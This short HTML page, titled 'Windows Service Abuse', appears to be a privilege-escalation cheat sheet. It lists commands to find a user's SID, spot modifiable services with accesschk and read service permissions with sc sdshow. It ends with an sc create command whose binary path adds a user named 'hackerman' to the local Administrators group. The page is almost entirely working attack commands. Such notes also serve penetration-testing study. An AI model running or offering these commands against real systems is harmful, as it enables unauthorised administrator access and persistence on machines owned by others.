<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows Service Abuse</title>
</head><body><b><u>Show permissions of what users/groups can access this service. </u></b><br/>
<br/>
1. wmic useraccount where name='username' get sid &nbsp; &nbsp;- this will give you your sid<br/>
<br/>
2. accesschk.exe -uwcqv "Username" &nbsp;* /accepteula &nbsp; - this will show potentially vulnerable services<br/>
<br/>
sc sdshow &lt;service name from accesschk&gt; &nbsp; &nbsp;- this will show permissions of a service<br/>
<br/>
<b><u>Create service to execute commands</u></b><br/>
<br/>
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators hackerman /add" start= auto</body></html>